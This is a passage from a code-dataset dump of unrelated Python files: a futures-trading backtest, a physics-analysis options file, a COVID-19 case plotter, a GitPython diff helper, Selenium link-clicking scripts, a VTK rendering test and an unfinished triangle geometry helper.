起始时间\n self.startDate = public.getDate(diff=-self.testDays) # 60天数据回测\n self.endDate = public.getDate(diff=0)\n\n self.total_tablename = 'train_total_1'\n self.detail_tablename = 'train_future_1'\n self.totalMethod = 'single'\n self.method = 'simTick' if self.isSimTickUse else 'quick'\n self.stage = 'single15'\n self.uidKey = \"%s_%s_%s_%s_%s_\" + self.method + \"_\" + self.stage\n self.isAll = 0\n\n def iterCond(self):\n # 多重组合参数输出\n keys = ['widthDeltaLine', 'scaleDiff2', 'scaleDiff']\n for s0 in self.__getattribute__(keys[0] + 'List'):\n self.__setattr__(keys[0], s0)\n\n for s1 in self.__getattribute__(keys[1] + 'List'):\n self.__setattr__(keys[1], s1)\n\n for s2 in self.__getattribute__(keys[2] + 'List'):\n self.__setattr__(keys[2], s2)\n\n yield '%s_%s_%s' % (str(s0), str(s1), str(s2))\n\n def tops(self, num=10):\n Total = train_total()\n Total.tablename = \"train_total\"\n return [m[0:1] for m in Total.last_top(num=num)]\n\n def switch(self):\n # 生成all\n\n if self.isAll == 1:\n self.isEmptyUse = True\n self.klineTypeList = ['15m', '30m']\n self.total_tablename = 'train_total_0'\n self.detail_tablename = 'train_future_0'\n self.empty()\n\n def empty(self):\n if self.isEmptyUse:\n Train = train_future()\n Total = train_total()\n Total.tablename = self.total_tablename\n Train.tablename = self.detail_tablename\n Train.empty()\n Total.empty()\n\n def Pool(self):\n time0 = time.time()\n\n pool = Pool(processes=self.processCount)\n shareDict = 
Manager().list([])\n\n Base = future_baseInfo()\n # 交易量大的,按价格排序, 类型:turple,第二位为夜盘收盘时间\n lists = Base.all(vol=100)\n tops = self.tops()\n # 清空数据库\n self.switch()\n\n for rs in lists:\n # 检查时间匹配\n codes = [rs[0]]\n if self.topUse and codes not in tops: continue\n print(rs)\n if codes[0] not in self.codeLists: continue\n\n for kt in self.klineTypeList:\n #self.start(codes, time0, kt, shareDict)\n try:\n pool.apply_async(self.start, (codes, time0, kt, shareDict))\n pass\n except Exception as e:\n print(e)\n continue\n pool.close()\n pool.join()\n\n cindex = 0\n\n def start(self, codes, time0, kt, shareDict):\n print(\"子进程启动:\", self.cindex, codes, time.time() - time0)\n\n self.klineType = kt\n # 主力合约\n self.codes = codes\n self.mCodes = mCodes = [n + '88' for n in codes]\n\n # 查询获得配置 - 费率和每手单量\n self.Base = future_baseInfo()\n for doc in self.Base.getInfo(codes):\n self.baseInfo[doc[\"code\"] + '88'] = doc\n\n cs = [self.baseInfo[m] for m in self.mCodes]\n\n # 计算tick 导致的滑点\n sh = [self.baseInfo[d + '88']['tick_size'] for d in codes]\n self.shift = [sh[i] * self.shiftScale for i in range(len(sh))]\n\n # 子进程共享类\n self.Rice = tick_csv_Rice()\n self.Rice.setTimeArea(cs[0][\"nightEnd\"])\n self.Train = train_future()\n self.Total = train_total()\n self.Total.tablename = self.total_tablename\n self.Train.tablename = self.detail_tablename\n\n # 查询获得N分钟K线\n dfs_l = self.Rice.kline(mCodes, period=self.klineType, start=self.startDate, end=self.endDate, pre=60)\n\n # 获得1分钟K线作为滚动线\n if self.isSimTickUse:\n dfs = self.Rice.kline(mCodes, period='1m', start=self.startDate, end=self.endDate, pre=0)\n else:\n dfs = dfs_l\n\n # 按时间截取并调整\n # dfs= self.dateAdjust(codes, dfs, sh)\n print('kline load:', mCodes, [len(dfs[m]) for m in mCodes])\n\n # 根据配置文件获取最佳交易手数对\n self.iniVolume = round(self.iniAmount / cs[0][\"lastPrice\"] / cs[0][\"contract_multiplier\"], 0)\n\n # 分参数执行\n results = []\n for period in self.periodList:\n for wdp in self.widthTimesPeriodList:\n self.widthTimesPeriod = int(wdp)\n docs = self.total(dfs, dfs_l, period=period)\n if docs is None or len(docs) == 0: continue\n logger.info((self.codes, period, self.klineType, len(docs), \" time:\", time.time() - time0))\n self.Total.insertAll(docs)\n\n # 混合K线-计算平均值和标准差\n def k_ma(self, d, p, close, period):\n # 截\n df = close[close.index < d][-period - 5:]\n df = df.append(pd.Series([p], index=[d]))\n # 平均值\n ma = ta.MA(df, timeperiod=period)\n std = ta.STDDEV(df, timeperiod=period, nbdev=1)\n # bullWidth\n width = (4 * std / ma * 100).fillna(0)\n\n # 近width变动\n wd1 = ta.MA(width - width.shift(1), timeperiod=self.widthTimesPeriod).fillna(0)\n wd2 = wd1 - wd1.shift(1)\n wd2m = wd2 * wd2 * wd2.shift(1)\n columns = ['ma', 'std', 'bullwidth', 'widthDelta', 'widthDelta2', 'wd2m']\n return pd.Series([x.values[-1] for x in [ma, std, width, wd1, wd2, wd2m]], index=columns)\n\n preNode, batchId = None, {}\n\n def total(self, dfs, dfs2=None, period=60):\n # 计算参数\n df0 = dfs[self.mCodes[0]]\n df0[\"rel_price\"] = close = df0[\"close\"]\n df0[\"datetime\"] = df0.index\n\n s0 = self.shift[0]\n p_l = df0[\"p_l\"] = (df0[\"close\"] + s0)\n p_h = df0[\"p_h\"] = (df0[\"close\"] - s0)\n\n if self.isSimTickUse:\n # 调用复合apply函数计算混合参数\n close2 = dfs2[self.mCodes[0]][\"close\"]\n df0_1 = df0.apply(lambda row: self.k_ma(row['datetime'], row['rel_price'], close2, period), axis=1)\n df0 = pd.concat([df0, df0_1], axis=1)\n\n else:\n df0[\"ma\"] = ma = ta.MA(close, timeperiod=period)\n df0[\"std\"] = std = ta.STDDEV(close, timeperiod=period, nbdev=1)\n # 上下柜\n # bullWidth\n 
df0[\"bullwidth\"] = width = (4 * std / ma * 100).fillna(0)\n # 近三分钟width变动\n df0[\"widthDelta\"] = wd1 = ta.MA(width - width.shift(1), timeperiod=self.widthTimesPeriod).fillna(0)\n df0[\"widthDelta2\"] = wd2 = wd1 - wd1.shift(1)\n df0[\"wd2m\"] = wd2 * wd2.shift(1)\n\n dif, dea, macd = ta.MACD(close, fastperiod=int(period / 3), slowperiod=period, signalperiod=9)\n df0[\"mastd\"] = ta.STDDEV(macd, timeperiod=period, nbdev=1)\n df0[\"macdm\"] = macd * macd.shift(1)\n df0[\"macd2d\"] = macd - macd.shift(1)\n df0[\"macd2dm\"] = (macd - macd.shift(1)) * (macd.shift(1) - macd.shift(2))\n\n # 相对波动\n df0['delta'] = (p_l - p_h) / df0['std']\n\n df1 = None\n # 循环 scale\n docs = []\n for scale in self.scaleList:\n for conds in self.iterCond():\n uid = self.uidKey % (\n '_'.join(self.codes), str(period), str(scale), self.klineType[:-1],\n str(self.widthTimesPeriod) + '_' + conds)\n\n self.stopTimeDiff = self.stopTimeLine * period * int(self.klineType[:-1])\n # 计算高低线值\n df0[\"top\"], df0[\"lower\"] = df0['ma'] + (scale - self.scaleDiff) * df0['std'], df0['ma'] - (\n scale + self.scaleDiff) * df0['std']\n\n if uid in self.csvList:\n file = self.Rice.basePath + '%s_%s_pre.csv' % ('_'.join(self.codes), self.klineType)\n print(uid, '---------------------------- to_cvs', file, df0.columns)\n df0.to_csv(file, index=0)\n\n # df0.fillna(0, inplace=True)\n # tot = None\n tot = self.detect(df0, df1, period=period, uid=uid)\n if tot is not None and tot['amount'] != 0:\n tot.update(\n {\n \"scale\": scale,\n \"method\": self.totalMethod,\n \"code\": self.codes[0],\n \"period\": period,\n \"uid\": uid,\n \"shift\": (p_l - p_h).mean(),\n \"createdate\": public.getDatetime()\n }\n )\n docs.append(tot)\n return docs\n\n def detect(self, df0, df1, period=15, uid=''):\n docs = self.stageApply(df0, df1, period=period, uid=uid)\n res = pd.DataFrame(docs)\n if len(res) > 0:\n if self.saveDetail:\n self.Train.insertAll(docs)\n\n diff = res[res['diff'] > 0]['diff'].mean()\n\n # 计算最大回测\n sum = res['income'].cumsum() + self.iniAmount\n inr = res['income'] / self.iniAmount\n # 计算夏普指数\n sha = (res['income'].sum() / self.iniAmount - 0.02 * self.testDays / 252) / inr.std()\n return {\n \"count\": int(len(docs) / 2),\n \"amount\": self.iniAmount,\n \"price\": res['rel_price'].mean(),\n \"income\": res[\"income\"].sum(),\n \"std\": res['rel_std'].mean(),\n \"delta\": res['delta'].mean(),\n \"maxdown\": ((sum.shift(1) - sum) / sum.shift(1)).max(),\n \"sharprate\": sha,\n \"timediff\": int(0 if np.isnan(diff) else diff)\n }\n else:\n return None\n\n def isEverOut(self, p1, p0, std, mode, b):\n for i in range(b, b - 5, -1):\n if (p1[i] - p0[i]) * mode > -self.scaleDiff2 * std[i] / 2: return True\n\n return False\n\n # 核心策略部分\n def stageApply(self, df0, df1, period=15, uid=''):\n isOpen, isRise, preDate, prePrice = 0, 0, None, 0\n doc, docs = {}, []\n\n ma, p_l, p_h, top, lower, std, delta, width, wd1, wd2, wd2m, macd2d, macd2dm = (df0[key] for key in\n \"ma,p_l,p_h,top,lower,std,delta,bullwidth,widthDelta,widthDelta2,wd2m,macd2d,macd2dm\".split(\n \",\"))\n\n sline, wline = self.stopTimeDiff, self.widthDeltaLine * width.mean() / 2.75\n\n for i in range(period, len(df0)):\n\n isRun, isstop = False, 0\n # 开仓2\n if delta[i] > self.deltaLine or np.isnan(ma[i]): continue\n\n cond1, cond2 = False, False\n if wline > 0:\n # 布林宽带变化率\n cond1 = (wd1[i] < wline) and (wd2[i] < (wline / 2))\n # 最大值\n cond2 = wd2m[i] < 0\n\n if isOpen == 0:\n # 突变状态开始\n # 大于上线轨迹\n if p_h[i] >= top[i] and cond1:\n isOpen = -1\n isRun = True\n\n elif p_l[i] <= 
lower[i] and cond1:\n isOpen = 1\n isRun = True\n\n elif self.isEverOut(p_h, top, std, 1, i) and not cond1 and (\n (macd2dm[i] < 0 and macd2d[i] > 0) or cond2):\n isOpen = -2\n isRun = True\n\n elif self.isEverOut(p_l, lower, std, -1, i) and not cond1 and (\n (macd2dm[i] < 0 and macd2d[i] < 0) or cond2):\n isOpen = 2\n isRun = True\n\n # 平仓\n else:\n # 回归ma则平仓 或 超过24分钟 或到收盘时间 强制平仓\n sign, dline = isOpen / abs(isOpen), - self.scaleDiff2 * std[i] / 2\n\n cond3 = (sign * ((p_h[i] if isOpen > 0 else p_l[i]) - ma[i]))\n #\n if cond3 >= -dline and not cond1 and (cond2 or (macd2dm[i] < 0 and sign * macd2d[i] < 0)):\n isOpen, isstop = 0, 2\n isRun = True\n\n elif cond3 >= 0 and cond1:\n isOpen = 0\n isRun = True\n\n # 超时止损\n elif sline > 0 and self.preNode is not None:\n tdiff = self.Rice.timeDiff(str(self.preNode[0]['createdate']), str(df0.index[i]), quick=sline)\n if tdiff > sline and cond3 >= -dline and cond2:\n isOpen, isstop = 0, 1\n isRun = True\n\n # 对冲类止损:\n else:\n pass\n\n if isRun:\n doc = self.order(df0.iloc[i], None, isOpen, uid, df0, isstop=isstop)\n if doc is not None:\n docs.append(doc)\n return docs\n\n batchId = None\n\n def calcIncome(self, n0, p0, df0):\n # 计算收益,最大/最小收益\n high = df0[(p0['createdate'] <= df0.index) & (df0.index <= n0['datetime'])]['high'].max()\n low = df0[(p0['createdate'] <= df0.index) & (df0.index <= n0['datetime'])]['low'].min()\n close = n0[\"close\"]\n sign = p0[\"mode\"] / abs(p0[\"mode\"])\n\n # 收入\n income = sign * (close - p0[\"price\"] - 2 * sign * self.shift[0]) * p0[\"vol\"] - p0[\"fee\"]\n # 最大收入\n highIncome = sign * ((high if sign > 0 else low) - p0[\"price\"] - 2 * sign * self.shift[0]) * p0[\"vol\"] - p0[\"fee\"]\n # 最大损失\n lowIncome = sign * ((high if sign < 0 else low) - p0[\"price\"] - 2 * sign * self.shift[0]) * p0[\"vol\"] - p0[\"fee\"]\n\n return income, highIncome, lowIncome, high, low\n\n\n def order(self, n0, n1, mode, uid, df0, isstop=0):\n # baseInfo 配置文件,查询ratio 和 每手吨数\n b0 = self.baseInfo[self.mCodes[0]]\n if mode != 0:\n self.batchId = uuid.uuid1()\n # 交易量\n v0 = self.iniVolume * b0[\"contract_multiplier\"]\n # 费率\n fee0 = (self.iniVolume * b0[\"ratio\"]) if b0[\"ratio\"] > 0.5 else ((b0[\"ratio\"]) * n0[\"close\"] * v0)\n\n doc = {\n \"createdate\": n0[\"datetime\"],\n \"code\": self.codes[0],\n \"price\": n0[\"close\"],\n \"vol\": self.preNode[0][\"vol\"] if self.preNode else v0,\n \"mode\": mode if not self.preNode else -self.preNode[0][\"mode\"],\n \"isopen\": 0 if mode == 0 else 1,\n \"fee\": fee0,\n \"income\": 0,\n \"isstop\": isstop,\n \"rel_price\": n0[\"rel_price\"],\n \"rel_std\": n0[\"std\"],\n \"bullwidth\": n0[\"bullwidth\"],\n \"widthDelta\": n0[\"widthDelta\"],\n \"price_diff\": n0[\"widthDelta2\"],\n \"shift\": n0[\"wd2m\"],\n \"delta\": n0[\"delta\"],\n \"batchid\": self.batchId,\n 'p_l': n0[\"p_l\"],\n 'p_h': n0[\"p_h\"],\n \"diff\": 0 if mode != 0 else self.Rice.timeDiff(str(self.preNode[0]['createdate']), str(n0[\"datetime\"])),\n \"uid\": uid\n }\n\n if mode == 0 and self.preNode:\n p0 = self.preNode[0]\n doc['income'], doc['highIncome'], doc['lowIncome'], doc['atr'], doc['macd'] = self.calcIncome(n0, p0, df0)\n doc[\"diff\"] = int(public.timeDiff(str(n0['datetime']), str(p0['createdate'])) / 60)\n\n self.preNode = None\n else:\n doc[\"income\"] = -doc[\"fee\"]\n self.preNode = [doc]\n return doc\n\n\ndef main():\n action = {\n \"kline\": 1,\n }\n\n if action[\"kline\"] == 1:\n obj = train_future_singleExpect0()\n obj.Pool()\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"com/train/train_future_singleExpect_v10.py","file_name":"train_future_singleExpect_v10.py","file_ext":"py","file_size_in_byte":17975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"352330508","text":"from Configurables import DaVinci\nfrom Configurables import Velo__VeloIPResolutionMonitorNT as IPMoni\n\ndv = DaVinci()\ndv.DataType = '2015'\ndv.DDDBtag = 'dddb-20150526'\ndv.CondDBtag = 'cond-20150625'\n#dv.EvtMax = 100\n\nipMoni = IPMoni('VeloIPResolutionMonitor')\nipMoni.CheckIDs = True\ndv.UserAlgorithms = [ipMoni]\ndv.TupleFile = 'IPTuple.root'\n","sub_path":"options/dvopts.py","file_name":"dvopts.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"626275942","text":"import os,sys,dotenv,logging,dateparser,random,argparse,pathlib2,csv,requests,math \nfrom datetime import datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import timedelta\n\nif __name__ == '__main__':\n    logging.basicConfig(filename='trythis.log',filemode='w',format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',level=logging.DEBUG)\n    logging.info(\"Program Started\")\n    response = requests.get('https://api.covid19data.cloud/')\n    response.json()\n    with open('csse_covid_19_data\\\\csse_covid_19_time_series\\\\time_series_covid19_confirmed_global.csv', newline='') as csvfile:\n        reader = csv.reader(csvfile)\n        dates = next(reader)\n        totals = np.zeros(len(dates)-4) \n        log_totals = np.zeros(len(dates)-4)\n        base_date = dateparser.parse(dates[4])\n        true_dates = [base_date + timedelta(days=x) for x in range(len(dates)-4)]\n        for row in reader:\n            if row[1] == 'US':\n                for days in range(4,len(dates)):\n                    totals[days-4] = totals[days-4] + int(row[days])\n        for days in range(4,len(dates)):\n            log_totals[days-4] = math.log(totals[days-4])\n    plt.figure()\n    plt.suptitle('US Confirmed Cases vs Log of Confirmed Cases')\n    plt.xlabel('time (days)')\n    plt.ylabel('Cases')\n    plt.subplot(211)\n    plt.title('Confirmed Cases')\n    plt.plot(true_dates,totals)\n    plt.subplot(212)\n    plt.title('Log of Confirmed Cases')\n    plt.plot(true_dates,log_totals)\n    plt.show()\n    logging.info(\"Program Finished\")","sub_path":"trythis.py","file_name":"trythis.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"481572251","text":"import os, shutil\nimport subprocess\n\nfrom git import Repo\n\nEMPTY_TREE_SHA = \"4b825dc642cb6eb9a060e54bf8d69288fbee4904\"\n\n\nclass GitWrapper:\n    def __init__(self, directory):\n        self.repo_path = directory\n\n    def parse_files_tree(self, tree):\n        try:\n            for item in tree.traverse():\n                if item.type == 'blob':\n                    print(item.name)\n                else:\n                    self.parse_files_tree(item)\n        except BaseException as e:\n            print(e)\n\n    def print_commit(self, commit):\n        print('----')\n        print(str(commit.hexsha))\n        print(\"\\\"{}\\\" by {} ({})\".format(commit.summary,\n                                         commit.author.name,\n                                         commit.author.email))\n        print(str(commit.authored_datetime))\n        print(str(\"count: {} and size: {}\".format(commit.count(),\n                                                  commit.size)))\n\n        print(\"Number of files changed: {}\".format(len(commit.diff())))\n        for diff_added in commit.diff():\n            print(diff_added.b_path)\n\n    def print_repository(self, repo):\n        print('Repo description: {}'.format(repo.description))\n        print('Repo active branch is {}'.format(repo.active_branch))\n        branches = repo.remotes.origin.refs\n        print('Number of 
branches : {}'.format(len(branches)))\n for branch in branches:\n commits = list(repo.iter_commits(branch))\n print('Branch named {} - commits number: {}'.format(branch, len(commits)))\n\n print('Last commit for repo is {}.'.format(str(repo.head.commit.hexsha)))\n\n def get_changed_files_number(self, commit, parent):\n accepted_suffix = ['.cpp', '.h', '.cc', '.c++', '.java', '.cs']\n\n changed_files = [item.a_path for item in commit.diff(parent)]\n nr_of_files_changed = 0\n for file in changed_files:\n file_name, file_extension = os.path.splitext(file)\n if file_extension in accepted_suffix:\n nr_of_files_changed += 1\n\n return nr_of_files_changed\n\n def find_file(self, file):\n for path, subdirs, files in os.walk(self.repo_path):\n for name in files:\n if name == file:\n return True\n return False\n\n def get_file_from_git(self, commit, path):\n\n try:\n os.system(\"git --work-tree=\" + self.repo_path + \"\\~deleted checkout \"+commit.hexsha+\" \"+path)\n except BaseException as e:\n print(e)\n\n def get_deleted_files(self, commit, parent):\n accepted_suffix = ['.cpp', '.h', '.cc', '.c++', '.java']\n\n for diff_added in commit.diff(parent).iter_change_type('D'):\n other, file = os.path.split(diff_added.b_path)\n file_name, file_extension = os.path.splitext(file)\n if file_extension in accepted_suffix and not self.find_file(file):\n self.get_file_from_git(commit, diff_added.b_path)\n\n def get_repo(self):\n repo = Repo(self.repo_path)\n os.chdir(self.repo_path)\n return repo\n\n def get_old_paths_from_logs(self, files_list):\n paths_dict = {}\n for file in files_list:\n try:\n rel_path = file.replace(self.repo_path, 'a')\n rel_path = rel_path.replace(\"\\\\\", '/')\n rel_path = rel_path.replace(\"//\", '/')\n paths_dict[rel_path] = set()\n cmd = \"git log --format='%n' --name-only --follow \" + file\n old_paths = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()\n old_paths = old_paths.decode('UTF-8')\n old_paths = old_paths.replace('\\n', '')\n old_paths = set(old_paths.split('\\'\\''))\n for path in old_paths:\n if path != '':\n paths_dict[rel_path].add(\"a/\" + path.replace('\\'', ''))\n print(file)\n except BaseException as e:\n print(e)\n print(file)\n return paths_dict\n\n def get_old_paths(self, files_list):\n repo = self.get_repo()\n paths_dict = {}\n\n if not repo.bare and not os.path.exists(self.repo_path+'/old_paths_dict.txt'):\n print(\"Searching git old paths ...\")\n paths_dict = self.get_old_paths_from_logs(files_list)\n try:\n f = open(self.repo_path + '/old_paths_dict.txt', 'w+')\n for key in paths_dict.keys():\n line = key + \":\"\n for path in paths_dict[key]:\n line += path + \",\"\n f.write(line + \"\\n\")\n f.close()\n except BaseException as e:\n print(e)\n print(\"Error in git old paths saving of: \" + self.repo_path)\n else:\n if os.path.exists(self.repo_path+'\\\\old_paths_dict.txt'):\n print(\"Import from file git old paths ...\")\n f = open(self.repo_path + '\\\\old_paths_dict.txt', 'r')\n lines = f.readlines()\n for line in lines:\n key, values = line.split(\":\")\n values = values.replace(\"\\n\", \"\")\n values = values.split(\",\")\n paths_dict[key] = values[:-1] # \"\\n\" will generate an additional empty item in list\n else:\n print(\"Cannot load old paths dict for \"+self.repo_path)\n return paths_dict\n\n def get_commits(self):\n current_dir = os.getcwd()\n repo = self.get_repo()\n try:\n os.mkdir(self.repo_path+\"\\~diffs\")\n except:\n print(\"Could not create folder: \" + self.repo_path + \"\\~diffs\")\n try:\n if not 
repo.bare:\n                print('Repo at '+self.repo_path+' successfully loaded.')\n                # self.print_repository(repo)\n                commits = list(repo.iter_commits(repo.active_branch))\n                commits = list(reversed(commits))\n                commits = commits[1:len(commits)]\n                print('Number of commits : {}'.format(len(commits)))\n                nr = 0\n                print_nr = 0\n                for commit in commits:\n                    try:\n                        parent = commit.parents[0] if commit.parents else EMPTY_TREE_SHA\n                        # self.getDeletedFiles(commit, parent)\n                        nr_of_files_changed = self.get_changed_files_number(commit, parent)\n                        if nr_of_files_changed >= 1:\n                            os.system(\"git diff \"+parent.hexsha+\" \"+commit.hexsha+\" > \"+self.repo_path+\"\\\\~diffs\\\\diff\"\n                                      + str(nr) + \"_FilesChanged_\"+str(nr_of_files_changed) + \"_Date_\" +\n                                      str(commit.authored_date)+\".txt\")\n                            nr += 1\n                        print_nr += 1\n                        print(print_nr)\n                    except BaseException as e:\n                        print(e)\n            else:\n                print('Could not load repository at ' + self.repo_path + '.')\n        except BaseException as e:\n            print(e)\n\n        os.chdir(current_dir)\n\n","sub_path":"wrappers/GitWrapper.py","file_name":"GitWrapper.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"535985745","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nclass BBCPage():\n\n    def __init__(self, driver):\n        self.driver = driver\n        self.openBBC()\n\n    def openBBC(self):\n        self.driver.get(\"http://bbc.com\")\n        # assert \"BBC - Homepage\" in self.driver.title\n        self.driver.implicitly_wait(3)\n\n    def findMultipleElements(self):\n        return self.driver.find_elements_by_tag_name(\"a\")\n\n    def getNavigationLinks(self):\n        nav_link = self.driver.find_element_by_id(\"orb-nav-links\")\n        return nav_link.find_elements_by_tag_name(\"a\")\n\n\nclass RediffPage():\n\n    def __init__(self, driver):\n        self.driver = driver\n        self.openRediff()\n\n    def openRediff(self):\n        self.driver.get(\"http://shopping.rediff.com/\")\n        self.driver.implicitly_wait(20)\n\n    def getProductCatLinks(self): \n        nav_link = self.driver.find_element_by_xpath('id(\"popular_cat\")')\n        return nav_link.find_elements_by_tag_name(\"a\")\n\n\ndef visitAllLinksSlow():\n    driver = webdriver.Firefox()\n    rediff = RediffPage(driver)\n    # fetch the category links before iterating over them\n    elements = rediff.getProductCatLinks()\n    l = len(elements)\n    for i in range(l):\n        e = elements[i]\n        if e.is_displayed():\n            e.click()\n            print(driver.title + \"\\n\")\n            rediff.openRediff()\n            elements = rediff.getProductCatLinks()\n    for e in elements:\n        print(\"Navlinks: \", e.text)\n\n    driver.close()\n\ndef visitAllLinksFast():\n    driver = webdriver.Firefox()\n    rediff = RediffPage(driver)\n    l = len(rediff.getProductCatLinks())\n    for i in range(1, 3):\n        driver.find_element_by_xpath(\"id(\\\"popular_cat\\\")/h3[%d]/a[1]\" %(i)).click()\n        print(driver.title)\n        driver.back()\n\n    driver.close()\n\nvisitAllLinksFast()","sub_path":"Selenium/selenium-bbc.py","file_name":"selenium-bbc.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"112062434","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# create pipeline\n#\nreader = vtk.vtkDataSetReader()\nreader.SetFileName(\"\" + str(VTK_DATA_ROOT) + \"/Data/RectGrid2.vtk\")\nreader.Update()\nwarper = vtk.vtkWarpVector()\nwarper.SetInputConnection(reader.GetOutputPort())\nwarper.SetScaleFactor(0.2)\nextract = vtk.vtkExtractGrid()\nextract.SetInputConnection(warper.GetOutputPort())\nextract.SetVOI(0,100,0,100,7,15)\nmapper = 
vtk.vtkDataSetMapper()\nmapper.SetInputConnection(extract.GetOutputPort())\nmapper.SetScalarRange(0.197813,0.710419)\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\n# Graphics stuff\n# Create the RenderWindow, Renderer and both Actors\n#\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.SetMultiSamples(0)\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n# Add the actors to the renderer, set the background and size\n#\nren1.AddActor(actor)\nren1.SetBackground(1,1,1)\nrenWin.SetSize(400,400)\ncam1 = ren1.GetActiveCamera()\ncam1.SetClippingRange(3.76213,10.712)\ncam1.SetFocalPoint(-0.0842503,-0.136905,0.610234)\ncam1.SetPosition(2.53813,2.2678,-5.22172)\ncam1.SetViewUp(-0.241047,0.930635,0.275343)\niren.Initialize()\n# render the image\n#\n# prevent the tk window from showing up then start the event loop\n# --- end of script --\n","sub_path":"Filters/General/Testing/Python/WarpVectorImage.py","file_name":"WarpVectorImage.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"249197645","text":"from app.main import db\r\nfrom app.main.model.valor import Valor\r\nfrom app.main.model.atributo import Atributo\r\nfrom app.main.model.tratamiento import Tratamiento\r\nfrom app.main.util.clases_auxiliares import ValorConsultar\r\nfrom app.main.util.dto import ValorDto\r\nfrom flask_restplus import marshal\r\n\r\n\r\n_valorConsultar = ValorDto.valorConsultar\r\n\r\n\r\ndef guardar_valor(valor):\r\n valor_consultar = (db.session.query(Valor)\r\n .filter(Valor.descripcion == valor['descripcion'])\r\n .filter(Valor.atributo_id == valor['atributo_id']).first())\r\n if not valor_consultar:\r\n nuevo_valor = Valor(\r\n descripcion= valor['descripcion'],\r\n atributo_id= valor['atributo_id']\r\n )\r\n guardar_cambios(nuevo_valor)\r\n respuesta = {\r\n 'estado': 'exito',\r\n 'mensaje': 'Atributo creado exitosamente'\r\n }\r\n return respuesta, 201\r\n else:\r\n respuesta = {\r\n 'estado': 'fallido',\r\n 'mensaje': 'La descripcion del valor ya existe para este atributo'\r\n }\r\n return respuesta, 409\r\n\r\n\r\ndef editar_valor(data):\r\n valor = Valor.query.filter_by(id=data['id']).first()\r\n if not valor:\r\n respuesta = {\r\n 'estado': 'fallido',\r\n 'mensaje': 'No existe el valor'\r\n }\r\n return respuesta, 409\r\n else:\r\n valor.descripcion = data['descripcion']\r\n guardar_cambios(valor)\r\n respuesta = {\r\n 'estado': 'exito',\r\n 'mensaje': 'Atributo editado exitosamente'\r\n }\r\n return respuesta, 201\r\n\r\n\r\ndef eliminar_valor(id):\r\n try:\r\n Valor.query.filter_by(id=id).delete()\r\n except:\r\n db.session.rollback()\r\n respuesta = {\r\n 'estado': 'fallido',\r\n 'mensaje': 'No existe el valor'\r\n }\r\n return respuesta, 409\r\n else:\r\n db.session.commit()\r\n respuesta = {\r\n 'estado': 'exito',\r\n 'mensaje': 'Atributo eliminado exitosamente'\r\n }\r\n return respuesta, 201\r\n\r\n\r\ndef obtener_valores_atributo(atributo_id):\r\n \"\"\" Obtiene los valores que pertenecen a un atributo\"\"\"\r\n valores = [ValorConsultar]\r\n valores_consultar = (db.session.query(Valor, Atributo, Tratamiento)\r\n .outerjoin(Atributo, Valor.atributo_id == Atributo.id)\r\n .outerjoin(Tratamiento, Atributo.tratamiento_id == Tratamiento.id)\r\n .filter(Valor.atributo_id == atributo_id).all())\r\n i = 0\r\n valores.clear()\r\n if not valores_consultar:\r\n return [], 201\r\n else:\r\n for item in valores_consultar:\r\n valores.insert(i, item[0])\r\n 
valores[i].tratamiento_id = item[2].id\r\n valores[i].color_primario = item[2].color_tratamiento.codigo\r\n i += 1\r\n return marshal(valores, ValorDto.valorConsultar) , 201\r\n\r\n\r\ndef obtener_valores_atributo_completo(atributo_id):\r\n \"\"\" Obtiene los valores de un atributo pero incluyendo el id de atributo y tratamiento padre y\r\n el color del tratamiento. Esta función es útil para presentar la vista de árbol de las herramientas de\r\n anotación y visualización\"\"\"\r\n valores = [ValorConsultar]\r\n valores_consultar = (db.session.query(Valor, Atributo, Tratamiento)\r\n .outerjoin(Atributo, Valor.atributo_id == Atributo.id)\r\n .outerjoin(Tratamiento, Atributo.tratamiento_id == Tratamiento.id)\r\n .filter(Valor.atributo_id == atributo_id).all())\r\n i = 0\r\n valores.clear()\r\n\r\n for item in valores_consultar:\r\n valores.insert(i, item[0])\r\n valores[i].tratamiento_id = item[2].id\r\n valores[i].color_primario = item[2].color_tratamiento.codigo\r\n i += 1\r\n return valores\r\n\r\n\r\ndef guardar_cambios(data):\r\n db.session.add(data)\r\n db.session.commit()\r\n","sub_path":"app/main/service/valor_service.py","file_name":"valor_service.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299454878","text":"import math \n\ndef obwod(x,y,z):\n ob=x+y+z\n return ob\n\ndef pole(x,y,z):\n p=(x+y+z)/2\n j=p*(p-x)*(p-y)*(p-z)\n k=math.sqrt(j)\n return k\n\ndef boki(x,y,z):\n if x==y:\n if y==z:\n return \"Równoboczny\"\n else:\n return \"Równoramienny\"\n elif x==z:\n if z==y:\n return \"Równoboczny\"\n else:\n return \"Równoramienny\"\n elif y==z:\n if z==x:\n return \"Równoboczny\"\n else:\n return \"Równoramienny\"\n else:\n return \"Różnoboczny\"\n\ndef kat(x,y,z):\n cosX=((y**2)+(z**2)-(x**2))/(2*y*z)\n cosY=((x**2)+(z**2)-(y**2))/(2*x*z)\n 